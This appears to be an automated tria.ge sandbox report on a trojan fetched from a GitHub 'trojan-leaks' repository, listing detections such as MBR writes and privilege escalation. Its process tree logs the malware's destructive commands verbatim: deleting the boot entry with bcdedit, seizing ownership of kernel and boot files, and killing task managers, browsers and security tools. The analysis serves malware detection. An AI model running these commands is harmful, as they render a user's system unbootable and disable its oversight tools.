Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1450s -
max time network
1364s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
30/05/2024, 12:55
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/trojan-leaks
Resource
win10-20240404-en
General
-
Target
https://github.com/pankoza2-pl/trojan-leaks
Malware Config
Signatures
-
Downloads MZ/PE file
-
Possible privilege escalation attempt 25 IoCs
pid Process 4612 takeown.exe 3116 icacls.exe 2084 icacls.exe 1476 icacls.exe 1316 icacls.exe 3600 takeown.exe 1208 takeown.exe 696 icacls.exe 4108 takeown.exe 2352 takeown.exe 2372 takeown.exe 4996 takeown.exe 4664 icacls.exe 1976 takeown.exe 872 takeown.exe 1900 icacls.exe 1256 icacls.exe 4396 icacls.exe 372 takeown.exe 3916 takeown.exe 1728 takeown.exe 704 icacls.exe 640 icacls.exe 4484 icacls.exe 484 takeown.exe -
Executes dropped EXE 3 IoCs
pid Process 1664 0x07.exe 1012 winconfig.exe 3232 DetectKey.exe -
Modifies file permissions 1 TTPs 25 IoCs
pid Process 4108 takeown.exe 1208 takeown.exe 3916 takeown.exe 704 icacls.exe 640 icacls.exe 696 icacls.exe 484 takeown.exe 4396 icacls.exe 872 takeown.exe 2352 takeown.exe 3116 icacls.exe 4664 icacls.exe 4996 takeown.exe 372 takeown.exe 3600 takeown.exe 1476 icacls.exe 1316 icacls.exe 1256 icacls.exe 4612 takeown.exe 1728 takeown.exe 2084 icacls.exe 1900 icacls.exe 4484 icacls.exe 1976 takeown.exe 2372 takeown.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 78 raw.githubusercontent.com 76 raw.githubusercontent.com 77 raw.githubusercontent.com -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 3632 bcdedit.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 0x07.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133615500475115657" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5060 chrome.exe 5060 chrome.exe 2324 chrome.exe 2324 chrome.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1664 0x07.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 5060 chrome.exe 5060 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe 5060 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1664 0x07.exe 1012 winconfig.exe 3232 DetectKey.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5060 wrote to memory of 1772 5060 chrome.exe 72 PID 5060 wrote to memory of 1772 5060 chrome.exe 72 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 1308 5060 chrome.exe 74 PID 5060 wrote to memory of 5028 5060 chrome.exe 75 PID 5060 wrote to memory of 5028 5060 chrome.exe 75 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76 PID 5060 wrote to memory of 2688 5060 chrome.exe 76
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/pankoza2-pl/trojan-leaks1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe349d9758,0x7ffe349d9768,0x7ffe349d97782⤵PID:1772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:22⤵PID:1308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:2688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2832 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:12⤵PID:4528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2840 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:12⤵PID:3384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:1784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:4628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2976 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4784 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:2228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4876 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1664 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:4396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5232 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:1476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:82⤵PID:4624
-
-
C:\Users\Admin\Downloads\0x07.exe"C:\Users\Admin\Downloads\0x07.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1664 -
C:\Windows\Temp\winconfig.exe"C:\Windows\Temp\winconfig.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1012 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2B40.tmp\2B41.tmp\2B42.bat C:\Windows\Temp\winconfig.exe"4⤵PID:2100
-
C:\Users\Admin\AppData\Roaming\DetectKey.exe"C:\Users\Admin\AppData\Roaming\DetectKey.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3232
-
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current}5⤵
- Modifies boot configuration data using bcdedit
PID:3632
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive5⤵PID:3156
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive5⤵PID:4352
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='mmc.exe' delete /nointeractive5⤵PID:4232
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='PartAssist.exe' delete /nointeractive5⤵PID:3064
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='control.exe' delete /nointeractive5⤵PID:4832
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive5⤵PID:2992
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager.exe' delete /nointeractive5⤵PID:2512
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager Protable.exe' delete /nointeractive5⤵PID:2212
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='CCleaner.exe' delete /nointeractive5⤵PID:4948
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp.exe' delete /nointeractive5⤵PID:2648
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64.exe' delete /nointeractive5⤵PID:4180
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64a.exe' delete /nointeractive5⤵PID:3932
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive5⤵PID:4652
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='regedit.exe' delete /nointeractive5⤵PID:1804
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='iexplore.exe' delete /nointeractive5⤵PID:1016
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='chrome.exe' delete /nointeractive5⤵PID:604
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='firefox.exe' delete /nointeractive5⤵PID:1568
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='opera.exe' delete /nointeractive5⤵PID:2960
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='edge.exe' delete /nointeractive5⤵PID:1264
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='msedge.exe' delete /nointeractive5⤵PID:1660
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='brave.exe' delete /nointeractive5⤵PID:4296
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='wmplayer.exe' delete /nointeractive5⤵PID:1988
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad.exe' delete /nointeractive5⤵PID:2300
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad++.exe' delete /nointeractive5⤵PID:2076
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive5⤵PID:3476
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive5⤵PID:3712
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive5⤵PID:3580
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive5⤵PID:4428
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskmgr.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:872
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\hal.dll"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4612
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\winload.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4108
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\ntoskrnl.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1208
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\perfmon.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:484
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\resmon.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2352
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1728
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskkill.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1976
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tasklist.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3916
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tskill.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4996
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2372
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Process Hacker 2"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:372
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\drivers"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3600
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive5⤵PID:2128
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive5⤵PID:1484
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive5⤵PID:2228
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive5⤵PID:4860
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3116
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\hal.dll" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2084
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\winload.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4664
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1900
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:704
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\logonui.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1256
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\resmon.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:640
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1476
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4396
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tskill.exe" /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4484
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:696
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1316
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive5⤵PID:2976
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive5⤵PID:3908
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive5⤵PID:2364
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive5⤵PID:1020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:984
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F5⤵PID:3892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:2752
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\hal.dll" /grant "everyone":F5⤵PID:3212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:1764
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F5⤵PID:4364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:2776
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F5⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:4832
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\logonui.exe" /grant "everyone":F5⤵PID:1800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:3032
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\resmon.exe" /grant "everyone":F5⤵PID:1560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:4420
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F5⤵PID:2176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:4400
-
-
